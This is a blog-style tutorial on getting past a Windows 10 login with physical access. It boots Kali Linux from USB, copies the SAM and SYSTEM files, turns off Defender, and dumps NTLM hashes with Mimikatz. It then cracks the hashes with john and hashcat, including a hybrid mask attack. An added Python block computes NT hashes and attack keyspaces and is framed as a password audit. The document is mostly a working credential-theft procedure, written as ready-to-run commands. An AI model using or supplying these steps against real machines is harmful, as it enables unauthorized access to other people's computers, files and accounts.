In this step-by-step guide, you'll learn how to dump Windows 10 password hashes and then recover the passwords with various hash-cracking techniques. The toolset used in this guide is Kali Linux, Mimikatz, a hypervisor, Hashcat and Johnny.
There are plenty of guides out there for cracking Windows hashes, but many of them are outdated because Windows keeps making it harder to recover hashes. I want to share the method that works on a modern Windows 10 system.
This guide assumes you have physical access to a Windows 10 computer and want to bypass the operating system password. To begin you'll need a few common items, so make sure you have the following:
What you need to get started:
- Physical access to Windows 10 Target
- Kali Bootable USB
- USB external storage drive
- Another computer running as a Linux host w/ Windows VM or Windows host w/ Linux VM
Finding the Hashes
Plug your Kali bootable USB into the target Windows system and boot from the USB instead of the Windows hard drive. This usually means pressing one of the F keys repeatedly during startup, but look up the BIOS boot-menu key(s) for your specific computer model and how to navigate its BIOS.
Once you see the screen above, you have successfully booted Kali Linux. In these photos I'm using an older version of Kali, so yours might look a bit different. The login credentials will probably be kali:kali; if that doesn't work, try root:toor (username:password). Once logged in, click on the "Files" icon:
Then navigate to the hard drive containing the Windows system. Clicking "+ Other Locations" shows all the hard disks in the computer; if there is only one hard drive, it should be right under the "Computer" entry:
Side note: at this point you have access to all the files on the Windows computer (this only works because the Windows volume is not encrypted; with BitLocker enabled, the disk is unreadable from Kali without the recovery key). If getting into the Windows OS isn't important to you and you just want to recover files, you can copy them from right here.
To harvest the Windows hashes we'll need these two files, SAM and SYSTEM:
Navigate to these files by “Opening in Terminal”:
Then change into the required directory with
cd Windows/System32/config
and copy both files to the desktop with
cp SAM /root/Desktop/SAM
cp SYSTEM /root/Desktop/SYSTEM
Now is a good time to plug in that external USB drive:
Find the USB external storage drive in the file manager and copy the SAM and SYSTEM files over to it:
Dumping the Hashes
Next, boot up that other Windows computer or Windows virtual machine:
Disable all the Windows Defender settings, because today we're going to be installing malware on purpose… (Defender will otherwise quarantine Mimikatz as soon as it is extracted.)
Download the latest release of Mimikatz, a very popular tool for extracting Windows credentials:
Yes… We know it’s malware. But it’s our malware!
Open up Command Prompt and change directory into the mimikatz/x64 folder you just downloaded and extracted:
Plug in that external USB drive and copy the SAM and SYSTEM files into the same mimikatz/x64 folder:
Finally, run mimikatz and dump the hashes with the following command:
lsadump::sam /system:SYSTEM /SAM:SAM
Scroll down a bit to find the NTLM hash for the user you want; this computer has the username "Hacker":
Cracking the Hashes
Since I'm running on a Linux host, I'll switch over to that. Alternatively, you can boot up a Kali Linux VM. Copy the hash from the Mimikatz output and echo it into a file:
echo "c7e86705ea4642f5b8a6e34d86333955" > hash.txt
The simplest password-cracking method, which will crack basic passwords, is john or hashcat with the rockyou.txt word list. It is pre-installed on Kali Linux; if you haven't already, unzip the word list with the following command:
Now run the following command to crack the hash:
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Alternatively we can crack it in essentially the same way with hashcat:
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
If you want to get a bit fancy, we can launch a more sophisticated attack. A lot of the passwords people use for their PCs are a common word followed by a few numbers and letters at the end. We can account for many of these passwords by first finding a list of common words; this common-password list from SecLists is perfect for this.
Download this word list and put it in the same local directory as your hashes. Next we use this word list in a hashcat hybrid attack (-a 6) with the mask ?a?a?a?a, which appends every combination of four characters drawn from the ?a set (uppercase, lowercase, digits and special characters). The full command looks like this:
hashcat -m 1000 -a 6 hash.txt common-passwords-win.txt ?a?a?a?a
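As an added example (not code from the original post), the following Python shows what the value echoed into hash.txt above actually is, and how much work the two attacks in this section represent. An NT hash is the MD4 of the UTF-16LE password with no salt and no iteration, so one hashed candidate can be compared against every dumped account at once, and the hybrid mask's cost is simply the word-list size times 95^4. The audit helper, the account names and the banned-password list are hypothetical and constructed for the example; MD4 is implemented from scratch so the block runs on Python builds where OpenSSL has retired md4 from hashlib.

```python
"""Added audit helper (not from the original post): shows what an NT hash is
made of and how much work the wordlist and hybrid attacks above represent.
Account names, hashes and word lists below are constructed for the example.
"""
import struct

# MD4 (RFC 1320) from scratch: hashlib's "md4" lives in OpenSSL's legacy
# provider and is missing on many current Python builds, so we don't rely on it.
def _f(x, y, z):
    return (x & y) | (~x & z)

def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)

def _h(x, y, z):
    return x ^ y ^ z

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

# Per round: boolean function, additive constant, message-word order, shifts.
_ROUNDS = (
    (_f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
    (_g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (_h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)

def md4(data: bytes) -> bytes:
    bit_len = len(data) * 8
    # Pad with 0x80, zeros up to 56 mod 64, then the 64-bit little-endian length.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in _ROUNDS:
            for i, k in enumerate(order):
                # Update "a", then rotate the registers so the next step updates
                # "d", then "c", then "b" (the ABCD/DABC/CDAB/BCDA pattern of the RFC).
                a = _rotl((a + func(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 of the UTF-16LE password. No salt, no iteration."""
    return md4(password.encode("utf-16-le")).hex()

def audit_against_banned(dumped: dict, banned: list) -> dict:
    """Return {account: banned password} for every account whose dumped NT hash
    matches a banned word. Because the hash is unsalted, each candidate is
    hashed once and compared against every account at the same time; that is
    the property hashcat -m 1000 relies on, and the reason a longer password
    helps far more than adding complexity to a short one."""
    by_hash = {}
    for user, h in dumped.items():
        by_hash.setdefault(h.lower(), []).append(user)
    hits = {}
    for candidate in banned:
        for user in by_hash.get(nt_hash(candidate), []):
            hits[user] = candidate
    return hits

# Sizes of hashcat's built-in charsets (from its mask-attack documentation).
HASHCAT_CHARSETS = {"?l": 26, "?u": 26, "?d": 10, "?s": 33, "?a": 95}

def hybrid_keyspace(wordlist_size: int, mask: str) -> int:
    """Number of candidates `hashcat -a 6 <wordlist> <mask>` will try: every
    word combined with every string the mask expands to."""
    combos = 1
    for i in range(0, len(mask), 2):
        combos *= HASHCAT_CHARSETS[mask[i:i + 2]]
    return wordlist_size * combos

def covered_by_hybrid(password: str, words: set, suffix_len: int = 4) -> bool:
    """Would the word + ?a?a?a?a hybrid attack above recover this password?
    True when it is a listed word plus exactly suffix_len trailing characters.
    Useful as a lint when reviewing a password policy."""
    return len(password) > suffix_len and password[:-suffix_len] in words

if __name__ == "__main__":
    # Constructed sample: a lab image audited with the owner's permission.
    dumped = {"Hacker": nt_hash("Welcome1!"), "svc_backup": "8846F7EAEE8FB117AD06BDD830B7586C"}
    banned = ["password", "Password1", "Welcome1!"]
    print(audit_against_banned(dumped, banned))
    print(hybrid_keyspace(1000, "?a?a?a?a"))
    print(covered_by_hybrid("summer2024", {"summer", "welcome"}))
```

The keyspace number is the useful takeaway for a defender: a 1,000-word list with ?a?a?a?a is about 8.1 × 10^10 candidates, which unsalted MD4 lets a single GPU finish in minutes, whereas each extra character in a genuinely random suffix multiplies the cost by 95.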
Thanks for Reading!
I hope this has helped you! If you know of a better method for cracking Windows hashes, please let me know. If you have any comments or criticisms, I'd also be happy to hear them. Here is my email.
I did say a lot of the guides on this topic were outdated, but these two were definitely the most helpful: